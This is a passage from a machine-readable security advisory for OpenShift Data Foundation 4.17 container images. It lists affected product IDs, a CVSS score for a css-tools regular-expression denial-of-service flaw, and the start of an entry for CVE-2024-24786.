"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5.3, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", version: "3.1", }, products: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "css-tools: Improper Input Validation causes Denial of Service via Regular Expression", }, { cve: "CVE-2024-24786", cwe: { id: "CWE-835", name: "Loop with Unreachable Exit Condition ('Infinite Loop')", }, discovery_date: "2024-03-06T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", 